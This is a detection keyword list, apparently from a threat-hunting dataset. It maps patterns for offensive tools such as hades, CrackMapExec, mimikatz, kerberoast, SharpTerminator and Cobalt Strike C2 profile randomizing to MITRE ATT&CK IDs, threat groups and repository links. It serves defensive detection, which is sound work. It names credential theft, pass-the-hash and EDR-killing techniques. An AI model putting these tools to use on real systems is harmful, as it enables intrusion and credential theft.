selfthread*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* --technique queueuserapc*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* --technique remotethread*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* --technique selfthread*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*.exe* -u administrator -H :*--shares*,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*.exe*\Terminator.sys*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,0,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*.exec*.interact.sh*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*.feeds.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.files.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.forums.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.ftp.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.get_c2profile*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*.go.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.groups.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.help.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.imap.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.img.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.interactsh.com,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,0,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*.kb.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.kerberoast.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.kirbi *,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*.ldapdump.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.lists.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.live.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.local.kirbi*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*.m.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.mail.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.media.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.mobile.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.mysql.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 